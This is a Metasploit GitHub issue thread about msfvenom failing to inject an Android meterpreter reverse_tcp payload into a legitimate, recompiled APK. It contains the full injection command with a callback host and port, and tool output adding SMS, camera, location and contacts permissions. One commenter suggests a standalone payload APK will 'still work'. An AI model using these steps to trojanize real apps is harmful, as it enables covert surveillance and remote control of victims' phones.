rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

MSFVENOM legit apk targetSdkVersion: '26' #10079

Closed DenDeze closed 2 years ago

DenDeze commented 6 years ago

Steps to reproduce

How'd you do it?

  1. Decompiled legit blah.apk with apktool to ~/blah, changed targetSdkVersion: '26' to targetSdkVersion: '22' (trying to ask the user to give all permissions at once).

  2. Recompiled the 'blah' folder back into blah.apk. blah.apk works on an Android device with the new targetSdkVersion.

What should happen?

Putting the payload inside the blahnew.apk fails.

msfvenom -x ~/blah.apk -p android/meterpreter/reverse_tcp LHOST=192.1.1.1 LPORT=444 -o blahnew.apk

What happens instead?

No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
Error: undefined method `[]' for nil:NilClass

Metasploit version

Framework: 4.16.57-dev
Console : 4.16.57-dev

I installed Metasploit with:

OS

4.15.0-kali3-amd64

DenDeze commented 6 years ago

Decompiled with apktool, compiled again after changing the SDK version. After this step I signed the APK. Now the injection seems to work fine until:

Application.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Rebuilding /home/myhome/test.apk with meterpreter injection as /tmp/d20180523-3982-qp9uar/output.apk
Error: Unable to rebuild apk with apktool

acidical commented 6 years ago

I guess you just have to create an apk file from scratch with msfvenom instead of injecting into a legit one. At least do this until a fix is released. It may be suspicious but it will still work.

bcoles commented 2 years ago

Two issues were reported. It is unclear what caused these issues. However, this issue is almost 4 years old.

Since then, apktool has had various updates including several bug fixes.

Metasploit's APK parsing was recently updated to provide more useful debug output in instances where (re)building APK files failed. If these issues reoccur, there should now be a more useful error message which can be used to diagnose the root cause.

Closing.